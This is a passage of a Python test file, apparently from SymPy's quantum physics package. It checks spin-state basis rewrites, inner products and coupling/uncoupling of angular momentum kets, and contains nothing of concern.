+ sqrt(2) * TensorProduct(JxKet(1, 1), JxKet(1, 1)) / 2
)
assert (
TensorProduct(JzKet(1, -1), JxKet(1, 1)).rewrite("Jx")
== TensorProduct(JxKet(1, -1), JxKet(1, 1)) / 2
+ sqrt(2) * TensorProduct(JxKet(1, 0), JxKet(1, 1)) / 2
+ TensorProduct(JxKet(1, 1), JxKet(1, 1)) / 2
)
assert TensorProduct(JxKet(1, 1), JyKet(1, 1)).rewrite("Jy") == I * TensorProduct(
JyKet(1, 1), JyKet(1, 1)
)
assert TensorProduct(JxKet(1, 0), JyKet(1, 1)).rewrite("Jy") == TensorProduct(
JyKet(1, 0), JyKet(1, 1)
)
assert TensorProduct(JxKet(1, -1), JyKet(1, 1)).rewrite("Jy") == -I * TensorProduct(
JyKet(1, -1), JyKet(1, 1)
)
assert (
TensorProduct(JzKet(1, 1), JyKet(1, 1)).rewrite("Jy")
== -TensorProduct(JyKet(1, -1), JyKet(1, 1)) / 2
- sqrt(2) * I * TensorProduct(JyKet(1, 0), JyKet(1, 1)) / 2
+ TensorProduct(JyKet(1, 1), JyKet(1, 1)) / 2
)
assert (
TensorProduct(JzKet(1, 0), JyKet(1, 1)).rewrite("Jy")
== -sqrt(2) * I * TensorProduct(JyKet(1, -1), JyKet(1, 1)) / 2
- sqrt(2) * I * TensorProduct(JyKet(1, 1), JyKet(1, 1)) / 2
)
assert (
TensorProduct(JzKet(1, -1), JyKet(1, 1)).rewrite("Jy")
== TensorProduct(JyKet(1, -1), JyKet(1, 1)) / 2
- sqrt(2) * I * TensorProduct(JyKet(1, 0), JyKet(1, 1)) / 2
- TensorProduct(JyKet(1, 1), JyKet(1, 1)) / 2
)
assert (
TensorProduct(JxKet(1, 1), JzKet(1, 1)).rewrite("Jz")
== TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
+ sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
assert (
TensorProduct(JxKet(1, 0), JzKet(1, 1)).rewrite("Jz")
== sqrt(2) * TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
- sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
assert (
TensorProduct(JxKet(1, -1), JzKet(1, 1)).rewrite("Jz")
== TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
- sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
assert (
TensorProduct(JyKet(1, 1), JzKet(1, 1)).rewrite("Jz")
== -TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
+ sqrt(2) * I * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
assert (
TensorProduct(JyKet(1, 0), JzKet(1, 1)).rewrite("Jz")
== sqrt(2) * I * TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
+ sqrt(2) * I * TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
assert (
TensorProduct(JyKet(1, -1), JzKet(1, 1)).rewrite("Jz")
== TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
+ sqrt(2) * I * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
# Symbolic
assert TensorProduct(JyKet(j1, m1), JxKet(j2, m2)).rewrite("Jy") == TensorProduct(
JyKet(j1, m1),
Sum(
WignerD(j2, mi, m2, pi * Rational(3, 2), 0, 0) * JyKet(j2, mi),
(mi, -j2, j2),
),
)
assert TensorProduct(JzKet(j1, m1), JxKet(j2, m2)).rewrite("Jz") == TensorProduct(
JzKet(j1, m1),
Sum(WignerD(j2, mi, m2, 0, pi / 2, 0) * JzKet(j2, mi), (mi, -j2, j2)),
)
assert TensorProduct(JxKet(j1, m1), JyKet(j2, m2)).rewrite("Jx") == TensorProduct(
JxKet(j1, m1),
Sum(WignerD(j2, mi, m2, 0, 0, pi / 2) * JxKet(j2, mi), (mi, -j2, j2)),
)
assert TensorProduct(JzKet(j1, m1), JyKet(j2, m2)).rewrite("Jz") == TensorProduct(
JzKet(j1, m1),
Sum(
WignerD(j2, mi, m2, pi * Rational(3, 2), -pi / 2, pi / 2) * JzKet(j2, mi),
(mi, -j2, j2),
),
)
assert TensorProduct(JxKet(j1, m1), JzKet(j2, m2)).rewrite("Jx") == TensorProduct(
JxKet(j1, m1),
Sum(
WignerD(j2, mi, m2, 0, pi * Rational(3, 2), 0) * JxKet(j2, mi),
(mi, -j2, j2),
),
)
assert TensorProduct(JyKet(j1, m1), JzKet(j2, m2)).rewrite("Jy") == TensorProduct(
JyKet(j1, m1),
Sum(
WignerD(j2, mi, m2, pi * Rational(3, 2), pi / 2, pi / 2) * JyKet(j2, mi),
(mi, -j2, j2),
),
)
def test_rewrite_coupled_state():
# Numerical
assert JyKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jx") == JxKetCoupled(
0, 0, (S.Half, S.Half)
)
assert JyKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jx") == -I * JxKetCoupled(
1, 1, (S.Half, S.Half)
)
assert JyKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jx") == JxKetCoupled(
1, 0, (S.Half, S.Half)
)
assert JyKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jx") == I * JxKetCoupled(
1, -1, (S.Half, S.Half)
)
assert JzKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jx") == JxKetCoupled(
0, 0, (S.Half, S.Half)
)
assert (
JzKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jx")
== JxKetCoupled(1, 1, (S.Half, S.Half)) / 2
- sqrt(2) * JxKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JxKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JzKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jx")
== sqrt(2) * JxKetCoupled(1, 1, (S(1) / 2, S.Half)) / 2
- sqrt(2) * JxKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JzKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jx")
== JxKetCoupled(1, 1, (S.Half, S.Half)) / 2
+ sqrt(2) * JxKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JxKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert JxKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jy") == JyKetCoupled(
0, 0, (S.Half, S.Half)
)
assert JxKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jy") == I * JyKetCoupled(
1, 1, (S.Half, S.Half)
)
assert JxKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jy") == JyKetCoupled(
1, 0, (S.Half, S.Half)
)
assert JxKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jy") == -I * JyKetCoupled(
1, -1, (S.Half, S.Half)
)
assert JzKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jy") == JyKetCoupled(
0, 0, (S.Half, S.Half)
)
assert (
JzKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jy")
== JyKetCoupled(1, 1, (S.Half, S.Half)) / 2
- I * sqrt(2) * JyKetCoupled(1, 0, (S.Half, S.Half)) / 2
- JyKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JzKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jy")
== -I * sqrt(2) * JyKetCoupled(1, 1, (S.Half, S.Half)) / 2
- I * sqrt(2) * JyKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JzKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jy")
== -JyKetCoupled(1, 1, (S.Half, S.Half)) / 2
- I * sqrt(2) * JyKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JyKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert JxKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jz") == JzKetCoupled(
0, 0, (S.Half, S.Half)
)
assert (
JxKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jz")
== JzKetCoupled(1, 1, (S.Half, S.Half)) / 2
+ sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JxKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jz")
== -sqrt(2) * JzKetCoupled(1, 1, (S(1) / 2, S.Half)) / 2
+ sqrt(2) * JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JxKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jz")
== JzKetCoupled(1, 1, (S.Half, S.Half)) / 2
- sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert JyKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jz") == JzKetCoupled(
0, 0, (S.Half, S.Half)
)
assert (
JyKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jz")
== JzKetCoupled(1, 1, (S.Half, S.Half)) / 2
+ I * sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
- JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JyKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jz")
== I * sqrt(2) * JzKetCoupled(1, 1, (S.Half, S.Half)) / 2
+ I * sqrt(2) * JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JyKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jz")
== -JzKetCoupled(1, 1, (S.Half, S.Half)) / 2
+ I * sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
# Symbolic
assert JyKetCoupled(j, m, (j1, j2)).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, 0, pi / 2) * JxKetCoupled(j, mi, (j1, j2)), (mi, -j, j)
)
assert JzKetCoupled(j, m, (j1, j2)).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, pi * Rational(3, 2), 0) * JxKetCoupled(j, mi, (j1, j2)),
(mi, -j, j),
)
assert JxKetCoupled(j, m, (j1, j2)).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), 0, 0) * JyKetCoupled(j, mi, (j1, j2)),
(mi, -j, j),
)
assert JzKetCoupled(j, m, (j1, j2)).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKetCoupled(j, mi, (j1, j2)),
(mi, -j, j),
)
assert JxKetCoupled(j, m, (j1, j2)).rewrite("Jz") == Sum(
WignerD(j, mi, m, 0, pi / 2, 0) * JzKetCoupled(j, mi, (j1, j2)), (mi, -j, j)
)
assert JyKetCoupled(j, m, (j1, j2)).rewrite("Jz") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* JzKetCoupled(j, mi, (j1, j2)),
(mi, -j, j),
)
def test_innerproducts_of_rewritten_states():
# Numerical
assert qapply(JxBra(1, 1) * JxKet(1, 1).rewrite("Jy")).doit() == 1
assert qapply(JxBra(1, 0) * JxKet(1, 0).rewrite("Jy")).doit() == 1
assert qapply(JxBra(1, -1) * JxKet(1, -1).rewrite("Jy")).doit() == 1
assert qapply(JxBra(1, 1) * JxKet(1, 1).rewrite("Jz")).doit() == 1
assert qapply(JxBra(1, 0) * JxKet(1, 0).rewrite("Jz")).doit() == 1
assert qapply(JxBra(1, -1) * JxKet(1, -1).rewrite("Jz")).doit() == 1
assert qapply(JyBra(1, 1) * JyKet(1, 1).rewrite("Jx")).doit() == 1
assert qapply(JyBra(1, 0) * JyKet(1, 0).rewrite("Jx")).doit() == 1
assert qapply(JyBra(1, -1) * JyKet(1, -1).rewrite("Jx")).doit() == 1
assert qapply(JyBra(1, 1) * JyKet(1, 1).rewrite("Jz")).doit() == 1
assert qapply(JyBra(1, 0) * JyKet(1, 0).rewrite("Jz")).doit() == 1
assert qapply(JyBra(1, -1) * JyKet(1, -1).rewrite("Jz")).doit() == 1
assert qapply(JyBra(1, 1) * JyKet(1, 1).rewrite("Jz")).doit() == 1
assert qapply(JyBra(1, 0) * JyKet(1, 0).rewrite("Jz")).doit() == 1
assert qapply(JyBra(1, -1) * JyKet(1, -1).rewrite("Jz")).doit() == 1
assert qapply(JzBra(1, 1) * JzKet(1, 1).rewrite("Jy")).doit() == 1
assert qapply(JzBra(1, 0) * JzKet(1, 0).rewrite("Jy")).doit() == 1
assert qapply(JzBra(1, -1) * JzKet(1, -1).rewrite("Jy")).doit() == 1
assert qapply(JxBra(1, 1) * JxKet(1, 0).rewrite("Jy")).doit() == 0
assert qapply(JxBra(1, 1) * JxKet(1, -1).rewrite("Jy")) == 0
assert qapply(JxBra(1, 1) * JxKet(1, 0).rewrite("Jz")).doit() == 0
assert qapply(JxBra(1, 1) * JxKet(1, -1).rewrite("Jz")) == 0
assert qapply(JyBra(1, 1) * JyKet(1, 0).rewrite("Jx")).doit() == 0
assert qapply(JyBra(1, 1) * JyKet(1, -1).rewrite("Jx")) == 0
assert qapply(JyBra(1, 1) * JyKet(1, 0).rewrite("Jz")).doit() == 0
assert qapply(JyBra(1, 1) * JyKet(1, -1).rewrite("Jz")) == 0
assert qapply(JzBra(1, 1) * JzKet(1, 0).rewrite("Jx")).doit() == 0
assert qapply(JzBra(1, 1) * JzKet(1, -1).rewrite("Jx")) == 0
assert qapply(JzBra(1, 1) * JzKet(1, 0).rewrite("Jy")).doit() == 0
assert qapply(JzBra(1, 1) * JzKet(1, -1).rewrite("Jy")) == 0
assert qapply(JxBra(1, 0) * JxKet(1, 1).rewrite("Jy")) == 0
assert qapply(JxBra(1, 0) * JxKet(1, -1).rewrite("Jy")) == 0
assert qapply(JxBra(1, 0) * JxKet(1, 1).rewrite("Jz")) == 0
assert qapply(JxBra(1, 0) * JxKet(1, -1).rewrite("Jz")) == 0
assert qapply(JyBra(1, 0) * JyKet(1, 1).rewrite("Jx")) == 0
assert qapply(JyBra(1, 0) * JyKet(1, -1).rewrite("Jx")) == 0
assert qapply(JyBra(1, 0) * JyKet(1, 1).rewrite("Jz")) == 0
assert qapply(JyBra(1, 0) * JyKet(1, -1).rewrite("Jz")) == 0
assert qapply(JzBra(1, 0) * JzKet(1, 1).rewrite("Jx")) == 0
assert qapply(JzBra(1, 0) * JzKet(1, -1).rewrite("Jx")) == 0
assert qapply(JzBra(1, 0) * JzKet(1, 1).rewrite("Jy")) == 0
assert qapply(JzBra(1, 0) * JzKet(1, -1).rewrite("Jy")) == 0
assert qapply(JxBra(1, -1) * JxKet(1, 1).rewrite("Jy")) == 0
assert qapply(JxBra(1, -1) * JxKet(1, 0).rewrite("Jy")).doit() == 0
assert qapply(JxBra(1, -1) * JxKet(1, 1).rewrite("Jz")) == 0
assert qapply(JxBra(1, -1) * JxKet(1, 0).rewrite("Jz")).doit() == 0
assert qapply(JyBra(1, -1) * JyKet(1, 1).rewrite("Jx")) == 0
assert qapply(JyBra(1, -1) * JyKet(1, 0).rewrite("Jx")).doit() == 0
assert qapply(JyBra(1, -1) * JyKet(1, 1).rewrite("Jz")) == 0
assert qapply(JyBra(1, -1) * JyKet(1, 0).rewrite("Jz")).doit() == 0
assert qapply(JzBra(1, -1) * JzKet(1, 1).rewrite("Jx")) == 0
assert qapply(JzBra(1, -1) * JzKet(1, 0).rewrite("Jx")).doit() == 0
assert qapply(JzBra(1, -1) * JzKet(1, 1).rewrite("Jy")) == 0
assert qapply(JzBra(1, -1) * JzKet(1, 0).rewrite("Jy")).doit() == 0
def test_uncouple_2_coupled_states():
# j1=1/2, j2=1/2
assert TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half))))
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)))
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))))
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))
)
)
)
)
# j1=1/2, j2=1
assert TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1))))
)
assert TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0))))
)
assert TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1))))
)
assert TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1))))
)
assert TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0))))
)
assert TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1))))
)
# j1=1, j2=1
assert TensorProduct(JzKet(1, 1), JzKet(1, 1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 1), JzKet(1, 1))))
)
assert TensorProduct(JzKet(1, 1), JzKet(1, 0)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 1), JzKet(1, 0))))
)
assert TensorProduct(JzKet(1, 1), JzKet(1, -1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 1), JzKet(1, -1))))
)
assert TensorProduct(JzKet(1, 0), JzKet(1, 1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 0), JzKet(1, 1))))
)
assert TensorProduct(JzKet(1, 0), JzKet(1, 0)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 0), JzKet(1, 0))))
)
assert TensorProduct(JzKet(1, 0), JzKet(1, -1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 0), JzKet(1, -1))))
)
assert TensorProduct(JzKet(1, -1), JzKet(1, 1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, -1), JzKet(1, 1))))
)
assert TensorProduct(JzKet(1, -1), JzKet(1, 0)) == expand(
uncouple(couple(TensorProduct(JzKet(1, -1), JzKet(1, 0))))
)
assert TensorProduct(JzKet(1, -1), JzKet(1, -1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, -1), JzKet(1, -1))))
)
def test_uncouple_3_coupled_states():
# Default coupling
# j1=1/2, j2=1/2, j3=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S(1) / 2, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S(1) / 2, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S(1) / 2, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S(1) / 2, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S(1) / 2, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S(1) / 2, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.NegativeOne / 2),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
# j1=1/2, j2=1, j3=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half))
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half))
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, S.Half)
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, Rational(-1, 2))
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, S.Half)
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, S.Half)
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, S.Half)
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
# Coupling j1+j3=j13, j13+j2=j
# j1=1/2, j2=1/2, j3=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
# j1=1/2, j2=1, j3=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S(1) / 2), JzKet(1, 1), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S(1) / 2), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S(1) / 2), JzKet(1, 0), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S(1) / 2), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S(1) / 2), JzKet(1, -1), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S(1) / 2),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
